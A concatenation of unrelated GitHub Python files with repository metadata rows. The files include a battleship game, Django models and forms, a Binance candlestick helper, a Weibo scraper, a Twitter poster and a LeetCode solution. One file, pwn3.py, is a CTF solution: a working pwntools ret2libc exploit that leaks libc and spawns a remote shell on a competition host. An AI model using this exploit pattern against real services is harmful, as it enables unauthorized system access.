if (not user_input[0] in board.capital_letters):
return False
else:
return True
#Validating coordinate format
def validate_user_input(user_input, board):
if (valid_letter(user_input, board) and valid_number(user_input)):
return True
else:
return False
#Ask for and return valid location string
def request_valid_location(raw_data, board):
while(not validate_user_input(raw_data, board)):
raw_data = raw_input("Please give coordinates in format 'A1'. ")
raw_data = quick_fix(raw_data)
return raw_data
#Asks user for and returns a valid str bomb location
def get_bomb_str(player_board_object):
raw_data = raw_input("Enter coordinates for a bomb. ")
raw_data = quick_fix(raw_data)
# print raw_data
# Validate string bomb location
# If invalid ask for string bomb location again
raw_data = request_valid_location(raw_data, player_board_object)
# print raw_data
return raw_data
#Checks for no winner
def no_winner(opponent_player_object):
# Check if all of opponents ships sunk
opponent_player_object.ships.all_sunk()
if (opponent_player_object.ships.fleet_sunk):
return False
else:
return True
#requesting ship placement for human
def request_placement_of_ship(ship_object, board_object, game_pieces_object, player_object):
while (ship_object.location_list_full() == False):
#Grid location list is empty.
print "Ships may only be placed horizontally or vertically."
#Ask user for start coordinate
print "Use letters A-J and numbers 1-10 for coordinates in the format 'A1'. "
print "Let's place your", ship_object.ship_name, "."
print ship_object.ship_name, "is ", ship_object.size, "cells long."
raw_data = raw_input("Please give the starting coordinates. Ex. 'A1'. ")
raw_data = quick_fix(raw_data)
# print raw_data
#Validates string, asks for new one till it validates
temp_location_str = request_valid_location(raw_data, board_object)
#Save start location string into ships start_location attribute
ship_object.ship_location_start(temp_location_str)
# print ship_object.start_location
#Convert start_location to a grid_location and save
ship_object.create_grid_start_loc(board_object)
# print ship_object.grid_loc_start
#Check of location is taken
#If all_ship dictionary is empty get end coordinates
if (game_pieces_object.all_ship_locations == {}):
#Ask for end location coordinates
print ship_object.start_location, "is your starting location. Ships may only be horizontal or vertical."
raw_data = raw_input("Enter your ending coordinates. ")
raw_data = quick_fix(raw_data)
#Valitdate user input string asks for valid string till it gets one.
temp_location_str = request_valid_location(raw_data, board_object)
#Saves the location string
ship_object.ship_location_end(temp_location_str)
#Save end location string into ship end_location attribute
ship_object.create_grid_end_loc(board_object)
#Create ship grid location list
#If true, add ships grid_loc_list to game_pieces all_ships dict
ship_object.create_grid_loc_list()
else:
#Check if start grid location is taken
#Check if ship already at location
# print "dictionary not empty"
if (game_pieces_object.is_taken(ship_object.grid_loc_start) == False):
#Location not taken ask for end location
#Ask for end location coordinates
print ship_object.start_location, "is your starting location. Ships may only be horizontal or vertical."
raw_data = raw_input("Enter your ending coordinates. ")
raw_data = quick_fix(raw_data)
#Valitdate user input string asks for valid string till it gets one.
temp_location_str = request_valid_location(raw_data, board_object)
#Saves the location string
ship_object.ship_location_end(temp_location_str)
#Creates the grid location
ship_object.create_grid_end_loc(board_object)
#Check if end location is already taken
if (game_pieces_object.is_taken(ship_object.create_grid_end_loc) == True):
#If it is not taken
#Create ship grid location list
#DELETE all location variables
ship_object.erase_start_locations()
ship_object.erase_end_locations()
print "Ships maynot overlap. Please re-enter your coordinates."
else:
#Create ship grid location list
#If true, add ships grid_loc_list to game_pieces all_ships dict
ship_object.create_grid_loc_list()
#Check if ship location list overlaps a previous ship
if (game_pieces_object.is_overlap(ship_object) == True):
#If it overlaps print error msg.
print "Ships maynot overlap. Please re-enter your coordinates."
#DELETE all location variables
ship_object.erase_start_locations()
ship_object.erase_end_locations()
ship_object.erase_grid_location_list()
#Go Back to getting Start Location coordinates
# print ship_object.grid_loc_list
# Save location list to ship location dictionary
game_pieces_object.add_ship_loc_dict(ship_object)
#Update players ship_board
board_object.update_grid_ship(ship_object)
#Print updated players ship board
player_object.print_my_ships_board()
| UTF-8 | Python | false | false | 6,050 | py | 14 | utilities.py | 9 | 0.722645 | 0.718678 | 0 | 188 | 31.170213 | 108 |
yangmin521/gjoa | 10,849,087,425,131 | 08f39e29fde03565ecac83545184e704bae0ad01 | 0f2c32602b82eb64295c3dc1a806eb3791b71e8d | /Classes/DBObjects/Address.py | f6f0f3059ccb9dbcb3c6240175cbb2ceab1d7b6d | []
| no_license | https://github.com/yangmin521/gjoa | 77a9a39477c979e0d71c55d606b03ad3270c397d | 7a120a02340d07eb2b1d85ad21897cc5488c7092 | refs/heads/master | 2022-10-11T19:43:56.385287 | 2020-06-05T21:16:48 | 2020-06-05T21:16:48 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from Classes.DBObjects.DBObject import DBObject
import decimal
# Class to handle address
class Address(DBObject):
def __init__(self, address=None, pub_id=None, address_type=None, status=None, amount=None):
super().__init__(table='addresses', key='aid')
# Assign attributes, if present.
self.address = address
self.pub_id = pub_id
self.address_type = address_type
self.balance = amount
self.status = status
# Method to check if this address already exists in the database
def check_address(self):
if self.address is not None:
return self.check(match_columns='address', matches=self.address)
return self.check(match_columns=['pub_id', 'address_type'], matches=[self.pub_id, self.address_type])
# Method to add or update this address to the database.
def push_address(self):
value_columns = ['address', 'balance', 'status', 'address_type', 'pub_id']
values = [self.address, self.balance, self.status, self.address_type, self.pub_id]
return self.push(value_columns=value_columns, values=values)
# Method to load an address from the database.
def pull_address(self):
data = self.pull()
if data is not None:
self.address = data[1]
self.address_type = data[2]
self.balance = data[4]
self.status = data[5]
# Only override public_key id if it was previously not known (for linking)
self.pub_id = data[6] if self.pub_id is None else self.pub_id
# Method to delete this address from the database.
def destroy_address(self):
self.destroy()
# TODO
# Method to figure out if this address is in the database already
def check_status(self):
result = 0
# If the private key is known, disqualify
result += 1 if self.status & 0b1 == 0b1 else 0 # Is this a generated pair?
result += 4 if self.status & 0b0100 == 0b0100 else 0 # Is the private key known?
if result != 0:
return result + 2 if self.pub_id is not None else result # Is the public key known
# If the public key is known, add 2.
result += 2 if self.pub_id is not None else 0
# If private key is not known, return active if the balance is above 0
result += 1 if self.balance > 0.0 else 0
return result | UTF-8 | Python | false | false | 2,450 | py | 23 | Address.py | 22 | 0.61551 | 0.601633 | 0 | 56 | 41.785714 | 109 |
5unKn0wn/ctfs | 3,839,700,790,584 | 980200562e61e4f8c770cfeb9416a009ee86ae44 | 8349aac7fbee610b2dbe5d1fa13e9d714a0264e3 | /2018/tamu/pwn3.py | 2af1e23ad5a2e0b5923dbbca14bfe6d0cb1885a0 | []
| no_license | https://github.com/5unKn0wn/ctfs | 3d3adde87ebbc8c2350e48274a15c35887444625 | b973773b43bdb4e6ad80606aa11b690fc44545cb | refs/heads/master | 2023-08-10T01:54:14.798392 | 2023-07-21T23:50:21 | 2023-07-21T23:50:21 | 92,021,189 | 34 | 8 | null | null | null | null | null | null | null | null | null | null | null | null | null | from pwn import *
r = remote("pwn.ctf.tamu.edu", 4323)
# r = process("./pwn3")
payload = "A" * 0xf2
payload += p32(0x08048390) # puts got
payload += p32(0x080485DB) # pr
payload += p32(0x0804A018) # libc got
payload += p32(0x080483D0)
r.sendlineafter("echo? ", payload)
r.recvuntil("\n")
libc = u32(r.recv(4)) - 0x18540
system = libc + 0x3ada0
binsh = libc + 0x15ba0b
log.info(hex(binsh))
payload = "A" * 0xf2
payload += p32(system) # puts got
payload += p32(0x41414141) # pr
payload += p32(binsh) # libc got
r.sendlineafter("echo? ", payload)
r.interactive()
| UTF-8 | Python | false | false | 572 | py | 212 | pwn3.py | 166 | 0.660839 | 0.520979 | 0 | 26 | 21 | 38 |
darkdrei/GestionRegistro | 9,749,575,771,658 | c79868661d0ba03700d9f0caa17b0576729458f6 | 6bf54f8c985ec27ae62680719d755ba302659aaa | /usuario/models.py | 3becb670b03426c353ec177bd817d54802bd3c2e | [
"MIT"
]
| permissive | https://github.com/darkdrei/GestionRegistro | b480ee7438d316d7def3508fe6b0f03658139e14 | df7d605822225251b19106e72e3bc20eb230249b | refs/heads/master | 2021-01-20T04:36:39.559415 | 2017-08-06T19:49:51 | 2017-08-06T19:49:51 | 89,705,335 | 0 | 0 | null | false | 2017-10-11T16:44:35 | 2017-04-28T12:46:50 | 2017-04-28T17:43:14 | 2017-10-11T16:44:15 | 5,383 | 0 | 0 | 2 | JavaScript | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
import re
from django.core import validators
from django.contrib.auth.models import User
from empresa import models as emp
# Create your models here.
class Documento(models.Model):
nombre = models.CharField(max_length=30)
descripcion = models.CharField(max_length=200, null=True, blank=True)
estado= models.BooleanField(default=True)
def __unicode__(self):
return u'%s'%self.nombre
#end def
def __str__(self):
return u'%s'%self.nombre
#end def
#end class
class Usuario(User):
documento = models.ForeignKey(Documento, verbose_name='Tipo de documento')
identificacion = models.CharField(max_length=15, unique=True, validators=[
validators.RegexValidator(re.compile('^[0-9]+$'), ('identificacion no valida'), 'invalid')])
telefono_fijo = models.CharField(verbose_name='Telefono fijo',max_length=15, blank=True, validators=[
validators.RegexValidator(re.compile('^[0-9]+$'), ('telefono no valido'), 'invalid')])
telefono_celular = models.CharField(verbose_name='Celular',max_length=15, validators=[validators.RegexValidator(
re.compile('^[0-9]+$'), ('telefono no valido'), 'invalid')])
estado = models.BooleanField(default=True)
def __unicode__(self):
return u'%s %s'%(self.first_name,self.last_name)
#end def
def __str__(self):
return u'%s %s'%(self.first_name,self.last_name)
#end def
#end class
class Cargo(models.Model):
empresa = models.ForeignKey(emp.Empresa)
nombre = models.CharField(max_length=30)
descripcion = models.CharField(max_length=200, null=True, blank=True)
estado= models.BooleanField(default=True)
def __unicode__(self):
return u'%s'%self.nombre
#end def
def __str__(self):
return u'%s'%self.nombre
#end def
#end class
class Empleado(Usuario):
tienda = models.ForeignKey(emp.Tienda)
direccion = models.CharField(max_length=50)
fecha_nacimiento = models.DateField(null=True, blank=True)
foto = models.ImageField(upload_to='empleado/', null=True, blank=True)
def __unicode__(self):
return u'%s %s'%(self.first_name,self.last_name)
#end def
def __str__(self):
return u'%s %s'%(self.first_name,self.last_name)
#end def
class Meta:
verbose_name = "Empleado"
verbose_name_plural = "Empleados"
#end class
#end class
class Administrador(Usuario):
tienda = models.ForeignKey(emp.Tienda)
direccion = models.CharField(max_length=50, null=True, blank=True)
fecha_nacimiento = models.DateField(null=True, blank=True)
foto = models.ImageField(upload_to='administrador/', null=True, blank=True)
def __unicode__(self):
return u'%s %s'%(self.first_name,self.last_name)
#end def
def __str__(self):
return u'%s %s'%(self.first_name,self.last_name)
#end def
class Meta:
verbose_name = "Administrador Tienda"
verbose_name_plural = "Administradores de Tiendas"
#end class
#end class
| UTF-8 | Python | false | false | 3,165 | py | 64 | models.py | 38 | 0.649605 | 0.641074 | 0 | 102 | 30.029412 | 130 |
j-kincaid/python-habits | 1,675,037,272,763 | e1ec11afa7f548e94308d825b4fbbc88633471bf | bcabfb5cc3bd9b228118b1c0e1348dd968c4fef1 | /mysteryNumber.py | bb782ed91a2c947e56c99a335fd008395cb48b23 | []
| no_license | https://github.com/j-kincaid/python-habits | f99df43c06f3fa6aecbebcbdf4a8985cfcad155e | 17d49b46a2c2161ed317032c6ba0bc293fbb635e | refs/heads/main | 2023-09-03T02:12:40.340032 | 2022-08-27T18:53:49 | 2022-08-27T18:53:49 | 430,483,969 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import random
# """
# Feedback: The first printed statement should clue the user
# in to what the program is doing. If they choose 1 in the beginning
# then the random number will be picked between 1 and 1, it
# will always be 1. It should say something more like
# A random number will be picked between 1 and the number you input
# or something along those lines.
# """
top_of_range = input("Thank you for playing the Mystery number game! Type a number between 1 and 100: ")
if top_of_range.isdigit():
top_of_range = int(top_of_range)
rNum = random.randint(1, top_of_range)
guesses = 0
print('You just chose a number. That is the greatest of the numbers that will be randomized. Try to guess the random number in 7 guesses or fewer.')
while True:
guesses += 1
user_guess = input("Make a guess: ")
if user_guess.isdigit():
user_guess = int(user_guess)
else:
print('Please type a number next time.')
continue
if user_guess == rNum:
print("Good Job! You guessed the number!")
break
elif user_guess > rNum:
print("You were above the number!")
else:
print("That's below the number!")
print("You guessed it in", guesses, "guesses")
| UTF-8 | Python | false | false | 1,232 | py | 22 | mysteryNumber.py | 21 | 0.670455 | 0.659903 | 0 | 35 | 34.142857 | 148 |
humphrey43/RaspBerry | 7,825,430,414,806 | e34c6b5f0ed04c7874759d5c906138c604778028 | f94f6cd9d337c91449d09776ac03e15736102fef | /RadioClock/src/radioclock/timebase.py | 8beea7aa12fe1a54c566108c12bdfeab9b3fa91f | []
| no_license | https://github.com/humphrey43/RaspBerry | 67a04276f17b5d50808cdd63165c5cf7cd5b18bb | aa46dd4e1eccd97140507c5797c874c52d9bd99c | refs/heads/master | 2021-01-10T10:11:39.258197 | 2016-03-27T17:52:24 | 2016-03-27T17:52:24 | 53,202,537 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | '''
Created on 24.02.2016
@author: hardy
'''
from datetime import datetime
from datetime import timedelta
from kivy.clock import Clock
from swbus import SWBusComponent
TIME_BASE = "TimeBase"
TIME = "Time"
SECOND = "Second"
MINUTE = "Minute"
FIRE = "Fire"
TIMER = "Timer"
INIT = "INIT"
STOP = "STOP"
class TimeBase(SWBusComponent):
timerlist = []
def __init__(self):
super(TimeBase, self).__init__(TIME_BASE)
self.run = True
self.time = datetime.now()
self.lastminute = datetime.now() - timedelta(minutes=1)
Clock.schedule_interval(self._check_time, 1)
def register(self):
self.announce_event(SECOND)
self.announce_event(MINUTE)
self.announce_event(FIRE)
self.define_value(TIME)
self.define_value(TIMER)
def bus_stop(self):
self.timerlist=[]
self.run = False
def get_time(self):
return self.time
def _check_time(self, dt):
self.time = datetime.now()
self.raise_event(SECOND, self.time)
diff = self.time - self.lastminute
if self.time.second == 0 or diff.seconds >= 60:
self.lastminute = self.time
self.raise_event(MINUTE, self.time)
for t in self.timerlist:
if t.nexttime <= self.time:
t.count = t.count + 1
self.raise_event(FIRE, t)
if t.repeat:
t.nexttime = t.nexttime + timedelta(0,t.interval)
else:
self.timerlist.remove(t)
return self.run
def set_timer(self, timer):
if timer.command == INIT:
if timer.nexttime is None:
timer.nexttime = datetime.now() + timedelta(0,timer.interval)
self.timerlist.append(timer)
else:
for t in self.timerlist:
if t.name == timer.name:
self.timerlist.remove(t)
break
class Timer:
command = ""
name = ""
interval = 0
count = 0
repeat = False
nexttime = None
| UTF-8 | Python | false | false | 2,163 | py | 29 | timebase.py | 24 | 0.539066 | 0.530744 | 0 | 85 | 24.341176 | 77 |
Prismary/taki | 352,187,358,751 | 149f2f849fa76aa754c120a6005e82ab233ea5ac | 70f15cb7ac90e532a16743a9bb4ef507ea76e62f | /twitter.py | 4c810ca4c143e1fb6425b89285b5a1d5991bba18 | []
| no_license | https://github.com/Prismary/taki | 5e56595fb631420547be7653c23d16d529a465e6 | b89ec42101508eeb6071e6568a9a4a7fa93e64c9 | refs/heads/master | 2020-09-26T19:03:49.783971 | 2020-04-13T14:26:28 | 2020-04-13T14:26:28 | 226,320,442 | 3 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | import tweepy
import yaml
with open('config.yml', 'r') as cfgfile:
config = yaml.load(cfgfile, Loader=yaml.FullLoader)
consumer_token = config['tokens']['twitter']['consumer_token']
consumer_secret = config['tokens']['twitter']['consumer_secret']
access_token = config['tokens']['twitter']['access_token']
access_secret = config['tokens']['twitter']['access_secret']
def tweet(msg):
auth = tweepy.OAuthHandler(consumer_token, consumer_secret)
auth.set_access_token(access_token, access_secret)
api = tweepy.API(auth)
try:
api.update_status(msg)
return "> Successfully posted status to twitter."
except tweepy.TweepError:
return "> Error while posting status to twitter."
| UTF-8 | Python | false | false | 689 | py | 6 | twitter.py | 4 | 0.730044 | 0.730044 | 0 | 20 | 33.45 | 64 |
bellyfat/crypto-derivative-trading-engine | 1,176,821,066,278 | 2939cd34491c5b9536504136388eb57a2975a428 | c1fe1de6f1d579437e515cf99e81f71ecfa9e5d5 | /diversifly/components/globals.py | d359a8dd1a9e81cfee908de67f23c7ae63412d67 | []
| no_license | https://github.com/bellyfat/crypto-derivative-trading-engine | 209d364681187fd467275718ed85b27354bfee48 | 11299d3c609f9acf7ef7264cce25c21a59ccc0a9 | refs/heads/main | 2023-05-09T23:47:26.652449 | 2021-06-01T21:48:51 | 2021-06-01T21:48:51 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import time as time
import pandas as pd
import numpy as np
from datetime import datetime, timezone, timedelta
import itertools as itertools
from unsync import unsync
from enum import Enum
import logging as logging
logging.basicConfig(format="%(asctime)s - %(message)s", level=logging.INFO)
# python binance
from binance.client import Client
# sockets
from binance.websockets import BinanceSocketManager
from twisted.internet import reactor
def utc_to_local(utc_dt):
LOCAL_TIMEZONE = datetime.now(timezone.utc).astimezone().tzinfo
return utc_dt.replace(tzinfo=timezone.utc).astimezone(tz=LOCAL_TIMEZONE)
def is_finished_bar(local_timezone_dt):
LOCAL_TIMEZONE = datetime.now(timezone.utc).astimezone().tzinfo
return 1 if local_timezone_dt < datetime.now(LOCAL_TIMEZONE) else 0
# TODO: this should be paralelized
@unsync
def get_finished_bars(client, symbol, STRATEGY_RUN_INTERVAL, since, MARKET):
if MARKET == "SPOT":
currency_bars = pd.DataFrame(client.get_historical_klines(symbol, STRATEGY_RUN_INTERVAL, since),
columns=['date', 'open', 'high', 'low', 'close', 'volume', 'closeTime', 'QAV',
'numberOfTrades', 'd1', 'd2', 'd3']) # .tail(1)
elif MARKET == "FUT":
currency_bars = pd.DataFrame(client.futures_klines(symbol=symbol, interval=STRATEGY_RUN_INTERVAL),
columns=['date', 'open', 'high', 'low', 'close', 'volume', 'closeTime', 'QAV',
'numberOfTrades', 'd1', 'd2', 'd3'])
currency_bars.closeTime = pd.to_datetime(currency_bars.closeTime, unit='ms')
currency_bars.date = pd.to_datetime(currency_bars.date, unit='ms')
currency_bars["closeTimeLocal"] = currency_bars.closeTime.apply(utc_to_local) # closeTime, unit='ms')
currency_bars["finishedBar"] = currency_bars.closeTimeLocal.apply(is_finished_bar)
currency_bars = currency_bars[currency_bars.finishedBar == 1]
currency_bars.index = currency_bars.date
return currency_bars
@unsync
def get_finished_bars2(client, symbol, STRATEGY_RUN_INTERVAL, since, MARKET, limit):
def is_finished_bar(local_timezone_dt):
LOCAL_TIMEZONE = datetime.now(timezone.utc).astimezone().tzinfo
return 1 if local_timezone_dt < datetime.now(LOCAL_TIMEZONE) else 0
try:
if MARKET == "S":
currency_bars = pd.DataFrame(client.get_historical_klines(symbol, STRATEGY_RUN_INTERVAL, since),
columns=['date', 'open', 'high', 'low', 'close', 'volume', 'closeTime', 'QAV',
'numberOfTrades', 'd1', 'd2', 'd3'])
elif MARKET == "F":
currency_bars = pd.DataFrame(
client.futures_klines(symbol=symbol, interval=STRATEGY_RUN_INTERVAL, limit=limit),
columns=['date', 'open', 'high', 'low', 'close', 'volume', 'closeTime', 'QAV',
'numberOfTrades', 'd1', 'd2', 'd3'])
currency_bars.date = pd.to_datetime(currency_bars.date, unit='ms')
currency_bars.index = currency_bars.date
return currency_bars
except Exception as e:
logging.info(f"get_finished_bars - Exception: {e}")
return None | UTF-8 | Python | false | false | 3,301 | py | 16 | globals.py | 13 | 0.63193 | 0.626174 | 0 | 73 | 44.232877 | 119 |
Billdex/weiboSpider | 11,261,404,265,852 | 5e55cab025f017dfbd933fcb03acfe722d5d7e0c | a64b042cb2c154ff7c913c17bd6677b02f2b753b | /relaySpider.py | 1e4b0f0154cbc0ac62c5e2d7234f6a0b427811a6 | []
| no_license | https://github.com/Billdex/weiboSpider | 1e527922e250a32a636eaf5ce154c6e50ca119fb | 7ae539a56fc28f1c30deb65afa99232b15431d6e | refs/heads/master | 2020-06-03T23:42:25.132479 | 2019-06-18T12:30:20 | 2019-06-18T12:30:20 | 191,780,662 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import time
import random
import matplotlib.pyplot as plt
from spiderUtils import *
# 获取某条微博转发用户的信息
def getRelayUsers(mid, num):
Users = []
for page in range(1, 25000):
url = 'https://m.weibo.cn/api/statuses/repostTimeline?id={}&page={}'.format(mid, page)
data = json.loads(getHtmlText(url))
if data['ok'] == 0 or num <= 0:
return Users
for relayUser in data['data']['data']:
UserInfo = dict()
# 因为在这个页面已经提供了用户的详细信息,就不再通过另一个api来获取用户信息
UserInfo['id'] = relayUser['user']['id']
UserInfo['name'] = relayUser['user']['screen_name']
UserInfo['gender'] = '女' if relayUser['user']['gender'] == 'f' else '男'
UserInfo['statuses_count'] = relayUser['user']['statuses_count']
UserInfo['desc'] = relayUser['user']['description']
UserInfo['fans_count'] = relayUser['user']['followers_count']
UserInfo['follow_count'] = relayUser['user']['follow_count']
printUserInfo(UserInfo)
Users.append(UserInfo)
num -= 1
# 别爬太快,会封ip
time.sleep(random.uniform(0.5, 1))
with open('./relayUsersData_cache.json', 'w', encoding='utf-8') as f:
f.write(json.dumps(Users, ensure_ascii=False))
return Users
if __name__ == '__main__':
# 蔡徐坤2019.5.7某条微博
mid = '4369316738673069'
try:
with open('./relayUsersData.json', 'r', encoding='utf-8') as f:
data = json.load(f)
except:
data = getRelayUsers(mid, 10000)
print(data)
with open('./relayUsersData.json', 'w', encoding='utf-8') as f:
f.write(json.dumps(data, ensure_ascii=False))
# 假粉转发比例
fans_fake = 0
fans_real = 0
for fansInfo in data:
if fansInfo['statuses_count'] <= 15 and fansInfo['fans_count'] <= 10:
fans_fake += 1
else:
fans_real += 1
name_list = ['假转发流量', '真转发流量']
num_list = [fans_fake, fans_real]
colors = ['gray', 'red']
# 圆形
plt.figure(1, figsize=(6, 6))
# 决定分割部分,及其与其它部分之间的间距
expl = [0, 0.1]
plt.pie(x=num_list, explode=expl, labels=name_list, autopct='%3.1f %%', colors=colors, shadow=True)
plt.rcParams['font.sans-serif'] = ['YouYuan']
plt.rcParams['axes.unicode_minus'] = False
plt.show() | UTF-8 | Python | false | false | 2,544 | py | 5 | relaySpider.py | 4 | 0.567464 | 0.542699 | 0 | 72 | 31.541667 | 103 |
Cornholius/web_library | 13,769,665,197,883 | c9cd61d9f51b57699806574f887f3da83267f419 | 29b24bad90a48399174da29335f9182e27ef0e82 | /library/forms.py | 7376aef0483a1c26ad0a522f0e12c1a3ef93146f | []
| no_license | https://github.com/Cornholius/web_library | fde9e58cafcd28c56195838d8623c55ade732d69 | 856a51697a0eff9ed5396333f0f6e13cb3e8acd0 | refs/heads/master | 2020-09-25T01:38:11.577269 | 2019-12-09T14:34:50 | 2019-12-09T14:34:50 | 225,890,053 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django import forms
class UserForm(forms.Form):
search_field = forms.CharField(label='', widget=forms.TextInput(attrs={'size': '40'}))
class AddBookForm(forms.Form):
author = forms.CharField(label='Автор', max_length=120, widget=forms.TextInput(attrs={'size': '68'}))
book_name = forms.CharField(label='Название', max_length=120, widget=forms.TextInput(attrs={'size': '68'}))
description = forms.CharField(required=False, label='Описание',
widget=forms.Textarea(attrs={'rows': 20, 'cols': 70}))
class DeleteBookForm(forms.Form):
author = forms.CharField(label='Автор', max_length=120, widget=forms.TextInput(attrs={'size': '68'}))
book_name = forms.CharField(label='Название', max_length=120, widget=forms.TextInput(attrs={'size': '68'}))
| UTF-8 | Python | false | false | 848 | py | 9 | forms.py | 5 | 0.670762 | 0.638821 | 0 | 20 | 39.55 | 111 |
jpawlikow/auth_app | 16,252,156,258,163 | 7cd6825ae8b9def423f3c5c303bc1d28ef80f790 | dcd6b89bf543f4ef533894336daa98eb16bc5628 | /account_app/admin.py | 1f7b6d0d0c5dfb4d52b363f8b363cfe1ed930fb4 | []
| no_license | https://github.com/jpawlikow/auth_app | 9f7bd52a0e02a12e7ed68b09bc36abef8302340a | 5af32754f2de53aeb274676cc8c46ea8da7e1b65 | refs/heads/master | 2022-04-22T16:17:19.338788 | 2020-04-18T11:41:36 | 2020-04-18T11:41:36 | 256,744,635 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.contrib import admin
from account_app.models import UserProfile, Site
@admin.register(UserProfile)
class UserProfileAdmin(admin.ModelAdmin):
pass
@admin.register(Site)
class SiteAdmin(admin.ModelAdmin):
pass
| UTF-8 | Python | false | false | 232 | py | 13 | admin.py | 10 | 0.788793 | 0.788793 | 0 | 12 | 18.333333 | 48 |
abhiabhi94/fulfil-io-trial-project | 19,215,683,715,494 | 6103d513100e6324f1218cabca6e8638797b5b6c | f56e703188ba38034e98a5475de15010648932ab | /product/managers/hook.py | 3e80a0db01bb2f4dfa8c2b2dba497fbe7dc64c1c | []
| no_license | https://github.com/abhiabhi94/fulfil-io-trial-project | ffb64a3f533efc3b1b30e660b2308c5a820f2582 | 627fbc517262ccbe6a2fdac89c695ba4a9fe2e5f | refs/heads/main | 2023-06-25T22:32:51.619299 | 2021-07-30T00:48:55 | 2021-07-30T01:01:01 | 390,752,201 | 7 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.db import models
class SubscriberManager(models.Manager):
def get_subscribers(self, event):
return self.filter(event=event)
| UTF-8 | Python | false | false | 150 | py | 51 | hook.py | 31 | 0.74 | 0.74 | 0 | 6 | 24 | 40 |
sky-dream/LeetCodeProblemsStudy | 1,872,605,767,070 | 54dd3e60480d697f5d0fe9d203a9f1d8b8a15fb7 | 6d25434ca8ce03f8fef3247fd4fc3a1707f380fc | /[0072][Hard][Edit_Distance]/Edit_Distance_4.py | fbd7c53e9064de801a2378489fcc5d8a91dd7a45 | []
| no_license | https://github.com/sky-dream/LeetCodeProblemsStudy | 145f620e217f54b5b124de09624c87821a5bea1b | e0fde671cdc9e53b83a66632935f98931d729de9 | refs/heads/master | 2020-09-13T08:58:30.712604 | 2020-09-09T15:54:06 | 2020-09-09T15:54:06 | 222,716,337 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # leetcode time cost : 92 ms
# leetcode memory cost : 16.2 MB
# Time Complexity: O(M*N)
# Space Complexity: O(M*N)
# solution 2. dp with recursion
class Solution:
def minDistance(self, s1, s2) -> int:
memo = dict() # the memory cache
def dp(i, j):
if (i, j) in memo:
return memo[(i, j)]
# base case
if i == -1: return j + 1
if j == -1: return i + 1
if s1[i] == s2[j]:
memo[(i, j)] = dp(i - 1, j - 1) # do nothing in this case
else:
memo[(i, j)] = min(
dp(i, j - 1) + 1, # insert
dp(i - 1, j) + 1, # delete
dp(i - 1, j - 1) + 1 # replace
)
return memo[(i, j)]
# the last index of i,j
return dp(len(s1) - 1, len(s2) - 1)
def main():
word1 = "horse" # expect is 3,
word2 = "ros"
obj = Solution()
result = obj.minDistance(word1, word2)
print("return result is ",result);
if __name__ =='__main__':
main() | UTF-8 | Python | false | false | 1,052 | py | 794 | Edit_Distance_4.py | 763 | 0.452381 | 0.421905 | 0 | 36 | 28.166667 | 70 |
GoogleCloudPlatform/PerfKitBenchmarker | 14,946,486,200,041 | 4d2b5a71db7ad8947620bf729485e973600fc0e4 | ecaba173879f92f24e3c951866fda23c0a4fc426 | /perfkitbenchmarker/resource.py | 6cf140127954e1443578e5b798d9aa63c58bd236 | [
"Classpath-exception-2.0",
"BSD-3-Clause",
"AGPL-3.0-only",
"MIT",
"GPL-2.0-only",
"Apache-2.0",
"LicenseRef-scancode-public-domain",
"BSD-2-Clause"
]
| permissive | https://github.com/GoogleCloudPlatform/PerfKitBenchmarker | 2f4917fd796db4eb90822c557d8fa08a497fbd48 | d0699f32998898757b036704fba39e5471641f01 | refs/heads/master | 2023-09-02T08:14:54.110308 | 2023-09-01T20:28:01 | 2023-09-01T20:28:38 | 21,950,910 | 1,923 | 567 | Apache-2.0 | false | 2023-09-13T22:37:42 | 2014-07-17T17:23:26 | 2023-09-11T14:39:11 | 2023-09-13T22:37:42 | 22,937 | 1,817 | 480 | 255 | Python | false | false | # Copyright 2014 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module containing abstract class for reliable resources.
The Resource class wraps unreliable create and delete commands in retry loops
and checks for resource existence so that resources can be created and deleted
reliably.
"""
import abc
import itertools
import logging
import time
from typing import List
from absl import flags
from perfkitbenchmarker import errors
from perfkitbenchmarker import sample
from perfkitbenchmarker import vm_util
FLAGS = flags.FLAGS
_RESOURCE_REGISTRY = {}
def GetResourceClass(base_class, **kwargs):
"""Returns the subclass with the corresponding attributes.
Args:
base_class: The base class of the resource to return
(e.g. BaseVirtualMachine).
**kwargs: Every attribute/value of the subclass's REQUIRED_ATTRS that were
used to register the subclass.
Raises:
Exception: If no class could be found with matching attributes.
"""
key = [base_class.__name__]
key += sorted(kwargs.items())
if tuple(key) not in _RESOURCE_REGISTRY:
raise errors.Resource.SubclassNotFoundError(
'No %s subclass defined with the attributes: %s' %
(base_class.__name__, kwargs))
resource = _RESOURCE_REGISTRY.get(tuple(key))
# Set the required attributes of the resource class
for key, value in kwargs.items():
setattr(resource, key, value)
return resource
class AutoRegisterResourceMeta(abc.ABCMeta):
"""Metaclass which allows resources to automatically be registered."""
# See BaseResource
RESOURCE_TYPE: str
REQUIRED_ATTRS: List[str]
def __init__(cls, name, bases, dct):
if (all(hasattr(cls, attr) for attr in cls.REQUIRED_ATTRS) and
cls.RESOURCE_TYPE):
unset_attrs = [
attr for attr in cls.REQUIRED_ATTRS if getattr(cls, attr) is None]
# Raise exception if subclass with unset attributes.
if unset_attrs and cls.RESOURCE_TYPE != cls.__name__:
raise Exception(
'Subclasses of %s must have the following attrs set: %s. For %s '
'the following attrs were not set: %s.' %
(cls.RESOURCE_TYPE, cls.REQUIRED_ATTRS, cls.__name__, unset_attrs))
# Flatten list type attributes with cartesian product.
